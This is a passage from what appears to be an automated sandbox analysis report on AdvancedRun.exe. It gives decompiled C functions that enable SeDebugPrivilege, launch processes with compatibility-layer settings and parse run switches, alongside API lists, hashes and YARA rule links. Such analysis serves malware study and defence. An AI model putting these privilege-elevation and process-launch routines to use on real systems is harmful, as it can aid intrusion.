                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: cess$kernel32.dll
                                                                                                                            • API String ID: 4275171209-1230238691
                                                                                                                            • Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                                                                                            • Instruction ID: 1c683e4a1bf394f720de90ff675bcae9460d67fa344838e0fd3c3e9825756cd4
                                                                                                                            • Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                                                                                            • Instruction Fuzzy Hash: 91526B74A01229DFDB64CF58D984BACBBB5BF09304F1480E9E54DAB391DB30AA85DF14
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 04900DF8, Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,04900223,?,?), ref: 04900E02
                                                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,04900223,?,?), ref: 04900E07
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000022.00000002.455554780.0000000004900000.00000040.00000001.sdmp, Offset: 04900000, based on PE: false
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction ID: d29d53ce8f3babb9fce1215b9dcd9af95d38e7ab233501decb4c2bacb40dbea1
                                                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction Fuzzy Hash: 97D0123114512C77D7002A94DC0DBCD7B1C9F05B66F008021FB0DE91C1C770994046E5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Analysis Process: AdvancedRun.exe PID: 772 Parent PID: 400 AdvancedRun.exeCOMMON

                                                                                                                            Executed Functions

                                                                                                                            Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}














                                                                                                                            0x00408fc9
                                                                                                                            0x00408fd0
                                                                                                                            0x00408fe8
                                                                                                                            0x00000000
                                                                                                                            0x00408fea
                                                                                                                            0x00408ff4
                                                                                                                            0x00409001
                                                                                                                            0x00409003
                                                                                                                            0x0040900c
                                                                                                                            0x0040900e
                                                                                                                            0x00409010
                                                                                                                            0x0040901a
                                                                                                                            0x0040901a
                                                                                                                            0x00409010
                                                                                                                            0x0040901f
                                                                                                                            0x00409026
                                                                                                                            0x0040902d
                                                                                                                            0x00409030
                                                                                                                            0x00409035
                                                                                                                            0x00409037
                                                                                                                            0x00409040
                                                                                                                            0x00409042
                                                                                                                            0x00409044
                                                                                                                            0x00409051
                                                                                                                            0x00409051
                                                                                                                            0x00409044
                                                                                                                            0x00409053
                                                                                                                            0x0040905e
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                              • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                            • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                                            • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                                            • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                                            • API String ID: 616250965-1253513912
                                                                                                                            • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                            • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                                            • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                            • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 83%
                                                                                                                            			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

































































                                                                                                                            0x004022d5
                                                                                                                            0x004022dd
                                                                                                                            0x004022e7
                                                                                                                            0x004022ec
                                                                                                                            0x004022f7
                                                                                                                            0x004022fa
                                                                                                                            0x004022fd
                                                                                                                            0x00402300
                                                                                                                            0x00402307
                                                                                                                            0x0040230d
                                                                                                                            0x0040230e
                                                                                                                            0x00402318
                                                                                                                            0x00402321
                                                                                                                            0x00402324
                                                                                                                            0x00402327
                                                                                                                            0x0040232a
                                                                                                                            0x0040232d
                                                                                                                            0x00402334
                                                                                                                            0x00402337
                                                                                                                            0x0040233e
                                                                                                                            0x0040234f
                                                                                                                            0x00402356
                                                                                                                            0x0040235b
                                                                                                                            0x0040235e
                                                                                                                            0x0040236d
                                                                                                                            0x00402374
                                                                                                                            0x0040237e
                                                                                                                            0x00402395
                                                                                                                            0x004023a0
                                                                                                                            0x004023a0
                                                                                                                            0x004023ac
                                                                                                                            0x004023cf
                                                                                                                            0x004023d2
                                                                                                                            0x004023d9
                                                                                                                            0x004023de
                                                                                                                            0x004023f6
                                                                                                                            0x00402403
                                                                                                                            0x00402414
                                                                                                                            0x00402419
                                                                                                                            0x00402403
                                                                                                                            0x0040241a
                                                                                                                            0x00402423
                                                                                                                            0x00402458
                                                                                                                            0x0040245d
                                                                                                                            0x00402464
                                                                                                                            0x00402467
                                                                                                                            0x00402468
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00402425
                                                                                                                            0x00402428
                                                                                                                            0x0040242b
                                                                                                                            0x00402433
                                                                                                                            0x00402434
                                                                                                                            0x00402473
                                                                                                                            0x00402473
                                                                                                                            0x0040247c
                                                                                                                            0x00402481
                                                                                                                            0x00402488
                                                                                                                            0x00402488
                                                                                                                            0x00402495
                                                                                                                            0x0040249a
                                                                                                                            0x004024b7
                                                                                                                            0x004024be
                                                                                                                            0x004024cd
                                                                                                                            0x004024d1
                                                                                                                            0x004024ed
                                                                                                                            0x004024f0
                                                                                                                            0x00402506
                                                                                                                            0x0040250b
                                                                                                                            0x00402512
                                                                                                                            0x00402518
                                                                                                                            0x00402519
                                                                                                                            0x0040251e
                                                                                                                            0x00402524
                                                                                                                            0x00402527
                                                                                                                            0x0040252b
                                                                                                                            0x00402530
                                                                                                                            0x00402531
                                                                                                                            0x00402531
                                                                                                                            0x0040253d
                                                                                                                            0x0040255a
                                                                                                                            0x00402561
                                                                                                                            0x00402570
                                                                                                                            0x00402574
                                                                                                                            0x00402590
                                                                                                                            0x00402593
                                                                                                                            0x004025a9
                                                                                                                            0x004025ae
                                                                                                                            0x004025b5
                                                                                                                            0x004025bb
                                                                                                                            0x004025bc
                                                                                                                            0x004025c1
                                                                                                                            0x004025c7
                                                                                                                            0x004025ca
                                                                                                                            0x004025cd
                                                                                                                            0x004025ce
                                                                                                                            0x004025d4
                                                                                                                            0x004025d4
                                                                                                                            0x004025da
                                                                                                                            0x004025e3
                                                                                                                            0x004025eb
                                                                                                                            0x00402633
                                                                                                                            0x004025fb
                                                                                                                            0x00402608
                                                                                                                            0x0040260f
                                                                                                                            0x00402614
                                                                                                                            0x00402624
                                                                                                                            0x00402630
                                                                                                                            0x00402630
                                                                                                                            0x0040263a
                                                                                                                            0x0040263b
                                                                                                                            0x00402646
                                                                                                                            0x0040264b
                                                                                                                            0x0040264c
                                                                                                                            0x0040265a
                                                                                                                            0x0040265a
                                                                                                                            0x0040265d
                                                                                                                            0x00402666
                                                                                                                            0x00402668
                                                                                                                            0x00402668
                                                                                                                            0x00402672
                                                                                                                            0x00402675
                                                                                                                            0x0040267e
                                                                                                                            0x0040267e
                                                                                                                            0x00402683
                                                                                                                            0x0040268b
                                                                                                                            0x0040269e
                                                                                                                            0x0040269e
                                                                                                                            0x004026a3
                                                                                                                            0x004026ac
                                                                                                                            0x004026b5
                                                                                                                            0x004026b8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004026ba
                                                                                                                            0x00000000
                                                                                                                            0x004026ae
                                                                                                                            0x004026ae
                                                                                                                            0x004026bf
                                                                                                                            0x004026c1
                                                                                                                            0x004026c6
                                                                                                                            0x004026cc
                                                                                                                            0x004026d5
                                                                                                                            0x004026db
                                                                                                                            0x004026e4
                                                                                                                            0x004026ea
                                                                                                                            0x004026f3
                                                                                                                            0x004026f9
                                                                                                                            0x00402707
                                                                                                                            0x00402707
                                                                                                                            0x0040270d
                                                                                                                            0x00402710
                                                                                                                            0x0040276d
                                                                                                                            0x00402770
                                                                                                                            0x0040280b
                                                                                                                            0x0040280e
                                                                                                                            0x00402813
                                                                                                                            0x00402810
                                                                                                                            0x00402810
                                                                                                                            0x00402810
                                                                                                                            0x00402819
                                                                                                                            0x0040281f
                                                                                                                            0x00402836
                                                                                                                            0x00402841
                                                                                                                            0x00402846
                                                                                                                            0x0040284a
                                                                                                                            0x00402851
                                                                                                                            0x00402857
                                                                                                                            0x00402860
                                                                                                                            0x00402865
                                                                                                                            0x00402876
                                                                                                                            0x00402879
                                                                                                                            0x00402888
                                                                                                                            0x00402888
                                                                                                                            0x00402857
                                                                                                                            0x00402891
                                                                                                                            0x0040289c
                                                                                                                            0x0040289c
                                                                                                                            0x00402779
                                                                                                                            0x00402784
                                                                                                                            0x0040278d
                                                                                                                            0x004027a4
                                                                                                                            0x004027b3
                                                                                                                            0x004027b8
                                                                                                                            0x004027bb
                                                                                                                            0x004027bf
                                                                                                                            0x004027c6
                                                                                                                            0x004027c6
                                                                                                                            0x004027d1
                                                                                                                            0x004027d6
                                                                                                                            0x004027d9
                                                                                                                            0x004027db
                                                                                                                            0x004027e2
                                                                                                                            0x004027e4
                                                                                                                            0x004027e4
                                                                                                                            0x004027e7
                                                                                                                            0x004027f4
                                                                                                                            0x004027fc
                                                                                                                            0x00402801
                                                                                                                            0x00402801
                                                                                                                            0x00402803
                                                                                                                            0x00402803
                                                                                                                            0x00402806
                                                                                                                            0x00000000
                                                                                                                            0x00402806
                                                                                                                            0x00402715
                                                                                                                            0x00402729
                                                                                                                            0x0040272e
                                                                                                                            0x00402731
                                                                                                                            0x00402738
                                                                                                                            0x00402738
                                                                                                                            0x00402743
                                                                                                                            0x00402748
                                                                                                                            0x0040274d
                                                                                                                            0x00402754
                                                                                                                            0x00402756
                                                                                                                            0x00402756
                                                                                                                            0x00402759
                                                                                                                            0x00402763
                                                                                                                            0x00000000
                                                                                                                            0x00402763
                                                                                                                            0x004026fb
                                                                                                                            0x00402700
                                                                                                                            0x00402702
                                                                                                                            0x00000000
                                                                                                                            0x00402702
                                                                                                                            0x004026ec
                                                                                                                            0x00000000
                                                                                                                            0x004026ec
                                                                                                                            0x004026dd
                                                                                                                            0x00000000
                                                                                                                            0x004026dd
                                                                                                                            0x004026ce
                                                                                                                            0x00000000
                                                                                                                            0x004026ce
                                                                                                                            0x004026ac
                                                                                                                            0x00402443
                                                                                                                            0x0040246a
                                                                                                                            0x00402470
                                                                                                                            0x00000000
                                                                                                                            0x00402470

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00402300
                                                                                                                            • memset.MSVCRT ref: 0040233E
                                                                                                                            • memset.MSVCRT ref: 00402356
                                                                                                                              • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                              • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                            • wcschr.MSVCRT ref: 00402387
                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                                              • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                                              • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                                            • wcschr.MSVCRT ref: 004023B7
                                                                                                                            • memset.MSVCRT ref: 004023D9
                                                                                                                            • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                                            • wcschr.MSVCRT ref: 0040242B
                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                                            • memset.MSVCRT ref: 004024BE
                                                                                                                            • memset.MSVCRT ref: 004024D1
                                                                                                                            • _wtoi.MSVCRT ref: 00402519
                                                                                                                            • _wtoi.MSVCRT ref: 0040252B
                                                                                                                            • memset.MSVCRT ref: 00402561
                                                                                                                            • memset.MSVCRT ref: 00402574
                                                                                                                            • _wtoi.MSVCRT ref: 004025BC
                                                                                                                            • _wtoi.MSVCRT ref: 004025CE
                                                                                                                            • wcschr.MSVCRT ref: 004025F0
                                                                                                                            • memset.MSVCRT ref: 0040260F
                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                                            • _snwprintf.MSVCRT ref: 0040264C
                                                                                                                            • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                                            • GetProcessAffinityMask.KERNEL32 ref: 00402879
                                                                                                                            • SetProcessAffinityMask.KERNEL32 ref: 00402888
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                                            • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                                            • API String ID: 2452314994-435178042
                                                                                                                            • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                            • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                                            • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                            • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 89%
                                                                                                                            			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t154;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12);
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
